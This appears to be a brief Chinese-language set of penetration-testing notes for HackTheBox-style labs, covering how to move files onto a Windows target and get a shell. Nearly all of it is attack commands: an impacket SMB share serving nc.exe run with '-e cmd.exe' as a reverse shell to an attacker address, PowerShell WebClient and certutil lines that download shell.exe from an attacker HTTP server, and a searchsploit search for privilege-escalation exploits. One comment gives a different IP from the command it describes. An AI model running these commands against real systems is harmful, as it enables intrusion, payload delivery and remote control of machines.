跳至主要內容
Windows 傳送檔案
smbserver:
- 開啟:
- python2 /usr/share/doc/python3-impacket/examples/smbserver.py share /root/Desktop/HTB/Bastard
- impacket-smbserver share .
- 丟檔案過去windows
- copy \\10.10.14.5\share\shell.exe . //複製shell.exe放置本地
- //10.10.14.5\share\nc.exe 10.10.14.5 6666 -e cmd.exe //執行10.10.14.5上的nc.exe,發起連線至10.10.10.5 6666端口
powershell:
- 丟檔案過去windows
- python2 -m SimpleHTTPServer 8888 //攻擊機執行
- powershell -c “(new-object System.Net.WebClient).DownloadFile(‘http://10.10.14.6:8888/shell.exe’, ‘c:\Users\Public\Downloads\shell.exe’)” //受害機上執行
certutil.exe:
- python2 -m SimpleHTTPServer 8888 //攻擊機執行
- certutil.exe -urlcache -split -f http://10.10.14.5:8888/shell.exe shell.exe //受害機上執行
Windows 提權
- searchsploit Windows Server 2003 | grep -i priv –color
Windows NC.exe
- nc發起連線至linux
- impacket-smbserver share /usr/share/windows-resources/binaries/
- //10.10.14.5\share\nc.exe 10.10.14.5 6666 -e cmd.exe
